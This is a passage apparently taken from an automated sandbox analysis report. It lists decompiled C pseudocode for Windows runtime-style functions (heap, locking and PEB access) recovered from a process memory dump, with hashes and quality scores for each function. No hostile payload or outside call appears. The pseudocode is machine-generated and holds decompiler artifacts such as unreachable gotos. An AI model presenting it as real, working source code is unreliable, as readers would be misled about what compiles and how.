                        								L28:
                        							} else {
                        								E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        								 *((intOrPtr*)(_t103 - 4)) = 1;
                        								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                        								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                        								_t76 = E02B22AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                        								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                        								__eflags = _t76 - 0xc0000100;
                        								if(_t76 == 0xc0000100) {
                        									 *((intOrPtr*)(_t103 - 0x1c)) = E02B22C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                        								}
                        								 *((intOrPtr*)(_t103 - 4)) = _t99;
                        								E02B22ACB();
                        							}
                        						}
                        					}
                        					L12:
                        					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                        					_t62 = _t102;
                        				}
                        				L13:
                        				return E02B4D0D1(_t62);
                        				goto L28;
                        			}






















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c6b9ac6703b9f349e97e5cc477a55a38c6fa5cec0c5a0acca546536250211bb
                        • Instruction ID: d23ebeb1ce2cf83bf9043a88fc96d4d2ad40d53160d059d6ef0315b945e84f03
                        • Opcode Fuzzy Hash: 7c6b9ac6703b9f349e97e5cc477a55a38c6fa5cec0c5a0acca546536250211bb
                        • Instruction Fuzzy Hash: 70517C71900229DFDF25DF55C880AEEBBB6FF48314F018095EC29AB260C7359956CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E02B24BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                        				signed int _v8;
                        				short _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v156;
                        				short _v158;
                        				intOrPtr _v160;
                        				char _v164;
                        				intOrPtr _v168;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t45;
                        				intOrPtr _t74;
                        				signed char _t77;
                        				intOrPtr _t84;
                        				char* _t85;
                        				void* _t86;
                        				intOrPtr _t87;
                        				signed short _t88;
                        				signed int _t89;
                        
                        				_t83 = __edx;
                        				_v8 =  *0x2bed360 ^ _t89;
                        				_t45 = _a8 & 0x0000ffff;
                        				_v158 = __edx;
                        				_v168 = __ecx;
                        				if(_t45 == 0) {
                        					L22:
                        					_t86 = 6;
                        					L12:
                        					E02AFCC50(_t86);
                        					L11:
                        					return E02B3B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                        				}
                        				_t77 = _a4;
                        				if((_t77 & 0x00000001) != 0) {
                        					goto L22;
                        				}
                        				_t8 = _t77 + 0x34; // 0xdce0ba00
                        				if(_t45 !=  *_t8) {
                        					goto L22;
                        				}
                        				_t9 = _t77 + 0x24; // 0x2be8504
                        				E02B12280(_t9, _t9);
                        				_t87 = 0x78;
                        				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                        				E02B3FA60( &_v156, 0, _t87);
                        				_t13 = _t77 + 0x30; // 0x3db8
                        				_t85 =  &_v156;
                        				_v36 =  *_t13;
                        				_v28 = _v168;
                        				_v32 = 0;
                        				_v24 = 0;
                        				_v20 = _v158;
                        				_v160 = 0;
                        				while(1) {
                        					_push( &_v164);
                        					_push(_t87);
                        					_push(_t85);
                        					_push(0x18);
                        					_push( &_v36);
                        					_push(0x1e);
                        					_t88 = E02B3B0B0();
                        					if(_t88 != 0xc0000023) {
                        						break;
                        					}
                        					if(_t85 !=  &_v156) {
                        						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                        					}
                        					_t84 = L02B14620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                        					_v168 = _v164;
                        					if(_t84 == 0) {
                        						_t88 = 0xc0000017;
                        						goto L19;
                        					} else {
                        						_t74 = _v160 + 1;
                        						_v160 = _t74;
                        						if(_t74 >= 0x10) {
                        							L19:
                        							_t86 = E02AFCCC0(_t88);
                        							if(_t86 != 0) {
                        								L8:
                        								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                        								_t30 = _t77 + 0x24; // 0x2be8504
                        								E02B0FFB0(_t77, _t84, _t30);
                        								if(_t84 != 0 && _t84 !=  &_v156) {
                        									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                        								}
                        								if(_t86 != 0) {
                        									goto L12;
                        								} else {
                        									goto L11;
                        								}
                        							}
                        							L6:
                        							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                        							if(_v164 != 0) {
                        								_t83 = _t84;
                        								E02B24F49(_t77, _t84);
                        							}
                        							goto L8;
                        						}
                        						_t87 = _v168;
                        						continue;
                        					}
                        				}
                        				if(_t88 != 0) {
                        					goto L19;
                        				}
                        				goto L6;
                        			}



























                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8b5eee82fc029e5b2652295b11d16cb67e020c5d4c7434292ca3e0430078661
                        • Instruction ID: f3bf2f792667aa85e3a8d2184c10814b2a2c4e085cca0f091e0898b7ef86e674
                        • Opcode Fuzzy Hash: a8b5eee82fc029e5b2652295b11d16cb67e020c5d4c7434292ca3e0430078661
                        • Instruction Fuzzy Hash: 1C419235A402289BCB21DF68C944BFAB7B9EF45750F0104E5E90CAB650DB78DE84CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02B24D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				char _v176;
                        				char _v177;
                        				char _v184;
                        				intOrPtr _v192;
                        				intOrPtr _v196;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short _t42;
                        				char* _t44;
                        				intOrPtr _t46;
                        				intOrPtr _t50;
                        				char* _t57;
                        				intOrPtr _t59;
                        				intOrPtr _t67;
                        				signed int _t69;
                        
                        				_t64 = __edx;
                        				_v12 =  *0x2bed360 ^ _t69;
                        				_t65 = 0xa0;
                        				_v196 = __edx;
                        				_v177 = 0;
                        				_t67 = __ecx;
                        				_v192 = __ecx;
                        				E02B3FA60( &_v176, 0, 0xa0);
                        				_t57 =  &_v176;
                        				_t59 = 0xa0;
                        				if( *0x2be7bc8 != 0) {
                        					L3:
                        					while(1) {
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t67 = _v192;
                        						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                        						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                        						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                        						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                        						_push( &_v184);
                        						_push(_t59);
                        						_push(_t57);
                        						_push(0xa0);
                        						_push(_t57);
                        						_push(0xf);
                        						_t42 = E02B3B0B0();
                        						if(_t42 != 0xc0000023) {
                        							break;
                        						}
                        						if(_v177 != 0) {
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        						}
                        						_v177 = 1;
                        						_t44 = L02B14620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                        						_t59 = _v184;
                        						_t57 = _t44;
                        						if(_t57 != 0) {
                        							continue;
                        						} else {
                        							_t42 = 0xc0000017;
                        							break;
                        						}
                        					}
                        					if(_t42 != 0) {
                        						_t65 = E02AFCCC0(_t42);
                        						if(_t65 != 0) {
                        							L10:
                        							if(_v177 != 0) {
                        								if(_t57 != 0) {
                        									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        								}
                        							}
                        							_t46 = _t65;
                        							L12:
                        							return E02B3B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                        						}
                        						L7:
                        						_t50 = _a4;
                        						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                        						if(_t50 != 3) {
                        							if(_t50 == 2) {
                        								goto L8;
                        							}
                        							L9:
                        							if(E02B3F380(_t67 + 0xc, 0x2ad5138, 0x10) == 0) {
                        								 *0x2be60d8 = _t67;
                        							}
                        							goto L10;
                        						}
                        						L8:
                        						_t64 = _t57 + 0x28;
                        						E02B24F49(_t67, _t57 + 0x28);
                        						goto L9;
                        					}
                        					_t65 = 0;
                        					goto L7;
                        				}
                        				if(E02B24E70(0x2be86b0, 0x2b25690, 0, 0) != 0) {
                        					_t46 = E02AFCCC0(_t56);
                        					goto L12;
                        				} else {
                        					_t59 = 0xa0;
                        					goto L3;
                        				}
                        			}





















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb245bf64e47fa05eb2caa9e0cfb0a96117a92cf3f8bdfac1dbbf75814d2962e
                        • Instruction ID: 670c1cef7f65377e9909a41a18b41aaa4dbfe6ff3fd85e3b2ba44f56bf7776c9
                        • Opcode Fuzzy Hash: cb245bf64e47fa05eb2caa9e0cfb0a96117a92cf3f8bdfac1dbbf75814d2962e
                        • Instruction Fuzzy Hash: BB41A471A40728AFEB26DF14CC80F67B7BAEB45714F0040D9E9499B690DB74DD48CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BBAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed int _v16;
                        				signed char _v20;
                        				intOrPtr _v24;
                        				char* _t37;
                        				void* _t47;
                        				signed char _t51;
                        				void* _t53;
                        				char _t55;
                        				intOrPtr _t57;
                        				signed char _t61;
                        				intOrPtr _t75;
                        				void* _t76;
                        				signed int _t81;
                        				intOrPtr _t82;
                        
                        				_t53 = __ecx;
                        				_t55 = 0;
                        				_v20 = _v20 & 0;
                        				_t75 = __edx;
                        				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                        				_v24 = __edx;
                        				_v12 = 0;
                        				if((_t81 & 0x01000000) != 0) {
                        					L5:
                        					if(_a8 != 0) {
                        						_t81 = _t81 | 0x00000008;
                        					}
                        					_t57 = E02BBABF4(_t55 + _t75, _t81);
                        					_v8 = _t57;
                        					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                        						_t76 = 0;
                        						_v16 = _v16 & 0;
                        					} else {
                        						_t59 = _t53;
                        						_t76 = E02BBAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                        						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                        							_t47 = E02BBAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                        							_t61 = _v20;
                        							if(_t61 != 0) {
                        								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                        								if(E02B9CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                        									L02B177F0(_t53, 0, _t76);
                        									_t76 = 0;
                        								}
                        							}
                        						}
                        					}
                        					_t82 = _v8;
                        					L16:
                        					if(E02B17D50() == 0) {
                        						_t37 = 0x7ffe0380;
                        					} else {
                        						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E02BB131B(_t53, _t76, _t82, _v16);
                        					}
                        					return _t76;
                        				}
                        				_t51 =  *(__ecx + 0x20);
                        				_v20 = _t51;
                        				if(_t51 == 0) {
                        					goto L5;
                        				}
                        				_t81 = _t81 | 0x00000008;
                        				if(E02B9CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                        					_t55 = _v12;
                        					goto L5;
                        				} else {
                        					_t82 = 0;
                        					_t76 = 0;
                        					_v16 = _v16 & 0;
                        					goto L16;
                        				}
                        			}




















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction ID: c81246cc25a7218010701ff3a3dfc93659c9990b42575ba3efee5323a794d57b
                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction Fuzzy Hash: E631C332F006446BDB269B65C895BFFF7ABDF84310F0580E9E825A7251DBB49D00CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02B08A0A(intOrPtr* __ecx, signed int __edx) {
                        				signed int _v8;
                        				char _v524;
                        				signed int _v528;
                        				void* _v532;
                        				char _v536;
                        				char _v540;
                        				char _v544;
                        				intOrPtr* _v548;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t44;
                        				void* _t46;
                        				void* _t48;
                        				signed int _t53;
                        				signed int _t55;
                        				intOrPtr* _t62;
                        				void* _t63;
                        				unsigned int _t75;
                        				signed int _t79;
                        				unsigned int _t81;
                        				unsigned int _t83;
                        				signed int _t84;
                        				void* _t87;
                        
                        				_t76 = __edx;
                        				_v8 =  *0x2bed360 ^ _t84;
                        				_v536 = 0x200;
                        				_t79 = 0;
                        				_v548 = __edx;
                        				_v544 = 0;
                        				_t62 = __ecx;
                        				_v540 = 0;
                        				_v532 =  &_v524;
                        				if(__edx == 0 || __ecx == 0) {
                        					L6:
                        					return E02B3B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                        				} else {
                        					_v528 = 0;
                        					E02B0E9C0(1, __ecx, 0, 0,  &_v528);
                        					_t44 = _v528;
                        					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                        					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                        					_t46 = 0xa;
                        					_t87 = _t81 - _t46;
                        					if(_t87 > 0 || _t87 == 0) {
                        						 *_v548 = 0x2ad1180;
                        						L5:
                        						_t79 = 1;
                        						goto L6;
                        					} else {
                        						_t48 = E02B21DB5(_t62,  &_v532,  &_v536);
                        						_t76 = _v528;
                        						if(_t48 == 0) {
                        							L9:
                        							E02B33C2A(_t81, _t76,  &_v544);
                        							 *_v548 = _v544;
                        							goto L5;
                        						}
                        						_t62 = _v532;
                        						if(_t62 != 0) {
                        							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                        							_t53 =  *_t62;
                        							_v528 = _t53;
                        							if(_t53 != 0) {
                        								_t63 = _t62 + 4;
                        								_t55 = _v528;
                        								do {
                        									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                        										if(E02B08999(_t63,  &_v540) == 0) {
                        											_t55 = _v528;
                        										} else {
                        											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                        											_t55 = _v528;
                        											if(_t75 >= _t83) {
                        												_t83 = _t75;
                        											}
                        										}
                        									}
                        									_t63 = _t63 + 0x14;
                        									_t55 = _t55 - 1;
                        									_v528 = _t55;
                        								} while (_t55 != 0);
                        								_t62 = _v532;
                        							}
                        							if(_t62 !=  &_v524) {
                        								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                        							}
                        							_t76 = _t83 & 0x0000ffff;
                        							_t81 = _t83 >> 0x10;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}




























                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dc905b52a6eb346a16a2ef94671e5e90efce5c31560ee5f6b5099fd9d869b0f
                        • Instruction ID: 093edf013dec6b7e02ec2dfb7c6ee7426d151c30b9db727d024019dc96988edb
                        • Opcode Fuzzy Hash: 1dc905b52a6eb346a16a2ef94671e5e90efce5c31560ee5f6b5099fd9d869b0f
                        • Instruction Fuzzy Hash: 914142B1A403289BDB25DF55C8C8BA9BBF5EB44300F1045E9D91997291DB719F84CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02BBFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t29;
                        				char* _t32;
                        				char* _t43;
                        				signed int _t80;
                        				signed int* _t84;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t56 = __edx;
                        				_t84 = __ecx;
                        				_t80 = E02BBFD4E(__ecx, __edx);
                        				_v12 = _t80;
                        				if(_t80 != 0) {
                        					_t29 =  *__ecx & _t80;
                        					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                        					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                        						E02BC0A13(__ecx, _t80, 0, _a4);
                        						_t80 = 1;
                        						if(E02B17D50() == 0) {
                        							_t32 = 0x7ffe0380;
                        						} else {
                        							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        						}
                        						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        							_push(3);
                        							L21:
                        							E02BB1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                        						}
                        						goto L22;
                        					}
                        					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                        						_t80 = E02BC2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                        						if(_t80 != 0) {
                        							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                        							_t77 = _v8;
                        							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                        								E02BBC8F7(_t66, _t77, 0);
                        							}
                        						}
                        					} else {
                        						_t80 = E02BBDBD2(__ecx[0xb], _t74, __edx, _a4);
                        					}
                        					if(E02B17D50() == 0) {
                        						_t43 = 0x7ffe0380;
                        					} else {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                        						goto L22;
                        					} else {
                        						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                        						goto L21;
                        					}
                        				} else {
                        					_push(__ecx);
                        					_push(_t80);
                        					E02BBA80D(__ecx[0xf], 9, __edx, _t80);
                        					L22:
                        					return _t80;
                        				}
                        			}











                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction ID: 8230ebf0a9a5ed1c29c030789d364f5ae1d5405dcb72341f3c3c157f0efac710
                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction Fuzzy Hash: 0231D636604644AFD7239B78CC48FBABBAAEF85750F1844D9F44A8BB41DBB4D841C710
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E02BBEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v15;
                        				char _v16;
                        				intOrPtr _v19;
                        				void* _v28;
                        				intOrPtr _v36;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t26;
                        				signed int _t27;
                        				char* _t40;
                        				unsigned int* _t50;
                        				intOrPtr* _t58;
                        				unsigned int _t59;
                        				char _t75;
                        				signed int _t86;
                        				intOrPtr _t88;
                        				intOrPtr* _t91;
                        
                        				_t75 = __edx;
                        				_t91 = __ecx;
                        				_v12 = __edx;
                        				_t50 = __ecx + 0x30;
                        				_t86 = _a4 & 0x00000001;
                        				if(_t86 == 0) {
                        					E02B12280(_t26, _t50);
                        					_t75 = _v16;
                        				}
                        				_t58 = _t91;
                        				_t27 = E02BBE815(_t58, _t75);
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					E02AFF900(_t91 + 0x34, _t27);
                        					if(_t86 == 0) {
                        						E02B0FFB0(_t50, _t86, _t50);
                        					}
                        					_push( *((intOrPtr*)(_t91 + 4)));
                        					_push( *_t91);
                        					_t59 =  *(_v8 + 0x10);
                        					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                        					_push(0x8000);
                        					_t11 = _t53 - 1; // 0x0
                        					_t12 = _t53 - 1; // 0x0
                        					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                        					E02BBAFDE( &_v12,  &_v16);
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					E02BBBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                        					_t55 = _v36;
                        					_t88 = _v36;
                        					if(E02B17D50() == 0) {
                        						_t40 = 0x7ffe0388;
                        					} else {
                        						_t55 = _v19;
                        						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t40 != 0) {
                        						E02BAFE3F(_t55, _t91, _v15, _t55);
                        					}
                        				} else {
                        					if(_t86 == 0) {
                        						E02B0FFB0(_t50, _t86, _t50);
                        						_t75 = _v16;
                        					}
                        					_push(_t58);
                        					_t88 = 0;
                        					_push(0);
                        					E02BBA80D(_t91, 8, _t75, 0);
                        				}
                        				return _t88;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction ID: 191d12d513e2d5b0a0ce4cea6e14b30a24e245232d32b70bf71cd1c635fb737a
                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction Fuzzy Hash: D031B072604705ABC72ADF24C880AABB7EAFFC1310F44496DF95687690DF70E805CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E02B769A6(signed short* __ecx, void* __eflags) {
                        				signed int _v8;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				signed short _v28;
                        				signed int _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				char* _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				signed int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				char _v72;
                        				signed short* _v76;
                        				signed int _v80;
                        				char _v84;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t68;
                        				intOrPtr _t73;
                        				signed short* _t74;
                        				void* _t77;
                        				void* _t78;
                        				signed int _t79;
                        				signed int _t80;
                        
                        				_v8 =  *0x2bed360 ^ _t80;
                        				_t75 = 0x100;
                        				_v64 = _v64 & 0x00000000;
                        				_v76 = __ecx;
                        				_t79 = 0;
                        				_t68 = 0;
                        				_v72 = 1;
                        				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                        				_t77 = 0;
                        				if(L02B06C59(__ecx[2], 0x100, __eflags) != 0) {
                        					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        					if(_t79 != 0 && E02B76BA3() != 0) {
                        						_push(0);
                        						_push(0);
                        						_push(0);
                        						_push(0x1f0003);
                        						_push( &_v64);
                        						if(E02B39980() >= 0) {
                        							E02B12280(_t56, 0x2be8778);
                        							_t77 = 1;
                        							_t68 = 1;
                        							if( *0x2be8774 == 0) {
                        								asm("cdq");
                        								 *(_t79 + 0xf70) = _v64;
                        								 *(_t79 + 0xf74) = 0x100;
                        								_t75 = 0;
                        								_t73 = 4;
                        								_v60 =  &_v68;
                        								_v52 = _t73;
                        								_v36 = _t73;
                        								_t74 = _v76;
                        								_v44 =  &_v72;
                        								 *0x2be8774 = 1;
                        								_v56 = 0;
                        								_v28 = _t74[2];
                        								_v48 = 0;
                        								_v20 = ( *_t74 & 0x0000ffff) + 2;
                        								_v40 = 0;
                        								_v32 = 0;
                        								_v24 = 0;
                        								_v16 = 0;
                        								if(E02AFB6F0(0x2adc338, 0x2adc288, 3,  &_v60) == 0) {
                        									_v80 = _v80 | 0xffffffff;
                        									_push( &_v84);
                        									_push(0);
                        									_push(_v64);
                        									_v84 = 0xfa0a1f00;
                        									E02B39520();
                        								}
                        							}
                        						}
                        					}
                        				}
                        				if(_v64 != 0) {
                        					_push(_v64);
                        					E02B395D0();
                        					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                        					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                        				}
                        				if(_t77 != 0) {
                        					E02B0FFB0(_t68, _t77, 0x2be8778);
                        				}
                        				_pop(_t78);
                        				return E02B3B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4174cb03d057467136980c21db17faaaf7ac1e6205739ddce5d1c18997edb9b
                        • Instruction ID: f63f89f04d29b7f63f13c16756086505834dc100fd0a3827f416aef1e83d59f4
                        • Opcode Fuzzy Hash: f4174cb03d057467136980c21db17faaaf7ac1e6205739ddce5d1c18997edb9b
                        • Instruction Fuzzy Hash: 2541AEB1D00608AFDB14CFA4C941BFEBBF9EF48714F0485AAE925A7250EB709945CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E02AF5210(intOrPtr _a4, void* _a8) {
                        				void* __ecx;
                        				intOrPtr _t31;
                        				signed int _t32;
                        				signed int _t33;
                        				intOrPtr _t35;
                        				signed int _t52;
                        				void* _t54;
                        				void* _t56;
                        				unsigned int _t59;
                        				signed int _t60;
                        				void* _t61;
                        
                        				_t61 = E02AF52A5(1);
                        				if(_t61 == 0) {
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                        					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                        				} else {
                        					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                        					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                        				}
                        				_t60 = _t59 >> 1;
                        				_t32 = 0x3a;
                        				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                        					_t52 = _t60 + _t60;
                        					if(_a4 > _t52) {
                        						goto L5;
                        					}
                        					if(_t61 != 0) {
                        						asm("lock xadd [esi], eax");
                        						if((_t32 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E02B395D0();
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					} else {
                        						E02B0EB70(_t54, 0x2be79a0);
                        					}
                        					_t26 = _t52 + 2; // 0xddeeddf0
                        					return _t26;
                        				} else {
                        					_t52 = _t60 + _t60;
                        					if(_a4 < _t52) {
